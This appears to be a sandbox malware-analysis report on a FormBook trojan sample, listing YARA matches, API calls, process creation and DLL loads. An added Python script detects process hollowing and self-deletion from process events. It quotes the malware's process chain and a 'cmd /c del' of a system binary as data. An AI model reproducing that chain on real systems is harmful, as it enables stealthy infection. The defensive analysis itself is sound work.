          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: file.exe PID: 5324, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 5020, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: wlanext.exe PID: 2924, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/11@6/3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0CE7A GetLastError,FormatMessageW,0_2_00F0CE7A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFAB84 AdjustTokenPrivileges,CloseHandle,0_2_00EFAB84
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00EFB134
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DD3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,4_2_00DD3355
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F0E1FD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F06532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00F06532
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00F1C18C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EC406B
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.dbJump to behavior
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\autBFC.tmpJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe explorer.exe
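The process-creation rows above show the chain a responder should be able to recognise from endpoint telemetry alone: the sample starts C:\Windows\SysWOW64\svchost.exe with its own command line (the hollowed host still carries "C:\Users\user\Desktop\file.exe"), the injected explorer.exe then launches autoconv.exe and wlanext.exe from SysWOW64, and the final stage runs cmd.exe /c del against the svchost.exe copy. The Python below is an added detection example and is not part of the Joe Sandbox report; it runs over constructed process-creation records modelled on those rows (the record layout, the benign services.exe control record and the short list of explorer.exe children are assumptions) and reports which of four indicators each record triggers.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: parent image, child image, child command line."""
    parent_image: str
    image: str
    cmdline: str


SYSTEM32 = "c:\\windows\\system32\\"
SYSWOW64 = "c:\\windows\\syswow64\\"
# SysWOW64 hosts that explorer.exe spawned in this run. A production rule would
# carry the fuller list of hosts the family is known to pick from; this short
# list is an assumption limited to what the report above shows.
SUSPICIOUS_EXPLORER_CHILDREN = {"autoconv.exe", "wlanext.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_system_dir(path: str) -> bool:
    return path.lower().startswith((SYSTEM32, SYSWOW64))


def first_token(cmdline: str) -> str:
    """Executable path as it appears on the command line, quoted or bare."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def indicators(ev: ProcEvent) -> list[str]:
    found: list[str] = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    claimed = basename(first_token(ev.cmdline))

    # 1. A system binary whose command line names a different executable: the
    #    child was created with the dropper's command line and its image was
    #    then replaced in memory (process hollowing). This is exactly the
    #    svchost.exe "C:\Users\user\Desktop\file.exe" row above.
    if in_system_dir(ev.image) and claimed and claimed != image:
        found.append("cmdline_image_mismatch")

    # 2. svchost.exe is started by services.exe on a healthy system; any other
    #    parent means the binary was started, and very likely hollowed, by hand.
    if image == "svchost.exe" and parent != "services.exe":
        found.append("svchost_unexpected_parent")

    # 3. explorer.exe launching a headless 32-bit host binary it has no reason
    #    to run (the injected explorer stage picking its next host).
    if (parent == "explorer.exe" and ev.image.lower().startswith(SYSWOW64)
            and image in SUSPICIOUS_EXPLORER_CHILDREN):
        found.append("explorer_spawns_syswow64_host")

    # 4. cmd.exe /c del of a file under System32 or SysWOW64: the final stage
    #    removing the hollowed host copy it no longer needs.
    m = re.search(r'/c\s+del\s+"?([^"]+?)"?\s*$', ev.cmdline, re.IGNORECASE)
    if image == "cmd.exe" and m and in_system_dir(m.group(1)):
        found.append("deletes_system_binary")
    return found


def analyze(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """(child image name, indicators) for every event that triggers at least one."""
    return [(basename(ev.image), indicators(ev)) for ev in events if indicators(ev)]


# Constructed records modelled on the "Process created" rows of this report; the
# last one (services.exe starting a normal svchost.exe) is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\file.exe", r"C:\Windows\SysWOW64\svchost.exe",
              r'"C:\Users\user\Desktop\file.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\autoconv.exe",
              r'"C:\Windows\SysWOW64\autoconv.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\wlanext.exe",
              r'"C:\Windows\SysWOW64\wlanext.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\wlanext.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WerFault.exe",
              r"C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for child, hits in analyze(SAMPLE_EVENTS):
        print(f"{child}: {', '.join(hits)}")
```

The conhost.exe and WerFault.exe records are there to show that an ordinary System32 child with a matching command line produces no hit; only the four rows that make up the FormBook chain do.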
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\explorer.exe | Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: sppc.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe | Section loaded: idstore.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe | Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe | Section loaded: samcli.dll
Source: C:\Windows\explorer.exe | Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe | Section loaded: winsta.dll
Source: C:\Windows\explorer.exe | Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe | Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe | Section loaded: devobj.dll
Source: C:\Windows\explorer.exe | Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe | Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe | Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe | Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe | Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe | Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe | Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe | Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe | Section loaded: appextension.dll
Source: C:\Windows\explorer.exe | Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe | Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe | Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe | Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe | Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe | Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe | Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe | Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe | Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe | Section loaded: cdp.dll
Source: C:\Windows\explorer.exe | Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe | Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe | Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: version.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe | Section loaded: cscui.dll
Source: C:\Windows\explorer.exe | Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe | Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinui.dll
Source: C:\Windows\explorer.exe | Section loaded: pdh.dll
Source: C:\Windows\explorer.exe | Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe | Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe | Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe | Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe | Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe | Section loaded: npsm.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe | Section loaded: mscms.dll
Source: C:\Windows\explorer.exe | Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe | Section loaded: tdh.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe | Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe | Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe | Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.graphics.display.displaycolormanagement.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe | Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.devices.enumeration.dll
